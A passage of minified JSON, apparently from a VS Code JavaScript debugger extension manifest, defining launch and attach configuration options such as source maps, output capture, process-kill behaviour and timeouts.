that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}},"type":"object"},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeExecutable":{"default":"node","markdownDescription":"Absolute path to VS Code.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"testConfiguration":{"default":"${workspaceFolder}/.vscode-test.js","markdownDescription":"Path to a test configuration file for the [test CLI](https://code.visualstudio.com/api/working-with-extensions/testing-extension#quick-setup-the-test-cli).","type":"string"},"testConfigurationLabel":{"default":"","markdownDescription":"A single configuration to run from the file. If not specified, you may be asked to pick.","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"required":[]}},"configurationSnippets":[],"deprecated":"Please use type extensionHost instead","label":"VS Code Extension Development","languages":["javascript","typescript","javascriptreact","typescriptreact"],"strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"pwa-extensionHost"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"launch":{"properties":{"args":{"default":["--extensionDevelopmentPath=${workspaceFolder}"],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":"array"},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"debugWebWorkerHost":{"default":true,"markdownDescription":"Configures whether we should try to attach to the web worker extension host.","type":["boolean"]},"debugWebviews":{"default":true,"markdownDescription":"Configures whether we should try to attach to webviews in the launched VS Code instance. This will only work in desktop VS Code.","type":["boolean"]},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"rendererDebugOptions":{"default":{"webRoot":"${workspaceFolder}"},"markdownDescription":"Chrome launch options used when attaching to the renderer process, with `debugWebviews` or `debugWebWorkerHost`.","properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the 